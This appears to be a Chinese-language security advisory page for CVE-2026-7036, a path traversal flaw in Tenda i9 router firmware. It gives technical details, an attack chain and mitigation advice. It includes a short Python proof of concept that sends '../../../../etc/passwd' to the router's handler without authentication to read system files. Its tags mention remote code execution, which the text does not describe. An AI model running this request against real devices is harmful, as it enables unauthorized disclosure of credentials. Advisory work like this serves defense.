IPBUF安全漏洞报告
English
CVE-2026-7036 CVSS 7.3 高危

CVE-2026-7036 Tenda i9路径遍历漏洞

披露日期: 2026-04-26
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7036
漏洞类型
路径遍历
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Tenda i9

相关标签

路径遍历Tenda i9IoT漏洞远程代码执行CVE-2026-7036

漏洞概述

CVE-2026-7036是Tenda i9路由器固件版本1.0.0.5(2204)中发现的一个高危路径遍历漏洞。该漏洞源于HTTP处理组件中的R7WebsSecurityHandlerfunction函数未能正确过滤用户输入。攻击者无需身份认证即可远程利用此漏洞,通过发送特制的恶意请求读取服务器上的敏感文件,导致信息泄露及系统完整性受损。

技术细节

该漏洞的根源在于Tenda i9路由器Web服务器接口的`R7WebsSecurityHandlerfunction`函数中存在输入验证缺失。当该函数处理HTTP请求中的特定参数时,未对路径字符(如`../`或`..\`)进行有效的清洗或转义。攻击者可以通过构造包含目录遍历序列的HTTP GET或POST请求,绕过Web根目录的访问限制。由于攻击复杂度低(AC:L)且无需用户交互(UI:N),远程攻击者可以利用此缺陷访问系统文件(如/etc/passwd、配置文件等),进而可能导致设备凭证泄露,为进一步的系统入侵提供条件。目前公开的PoC代码已证实了该攻击向量的有效性。

攻击链分析

STEP 1
侦察
攻击者扫描网络中开放的Tenda i9路由器服务,识别目标设备的固件版本。
STEP 2
漏洞利用
攻击者向目标路由器的`R7WebsSecurityHandlerfunction`接口发送特制的HTTP POST请求,在参数中插入`../`路径遍历序列。
STEP 3
数据窃取
路由器解析恶意请求,未能过滤路径字符,导致系统返回`/etc/passwd`或其他敏感配置文件的内容给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Replace with actual IP) target_url = "http://192.168.0.1/goform/R7WebsSecurityHandler" # Payload to read /etc/passwd using path traversal payload = { "filepath": "../../../../etc/passwd" } try: # Send malicious request without authentication response = requests.post(target_url, data=payload, timeout=5) # Check if exploit was successful if response.status_code == 200 and "root:" in response.text: print("[+] Exploit successful! Vulnerable to path traversal.") print("[+] Response content:") print(response.text) else: print("[-] Exploit failed or target not vulnerable.") print(response.text) except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

Tenda i9 1.0.0.5(2204)

防御指南

临时缓解措施
建议用户立即断开受影响设备的互联网连接或通过ACL限制访问来源,并密切关注厂商发布的安全补丁进行更新。在未修复前,切勿将管理端口暴露在不可信网络中。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表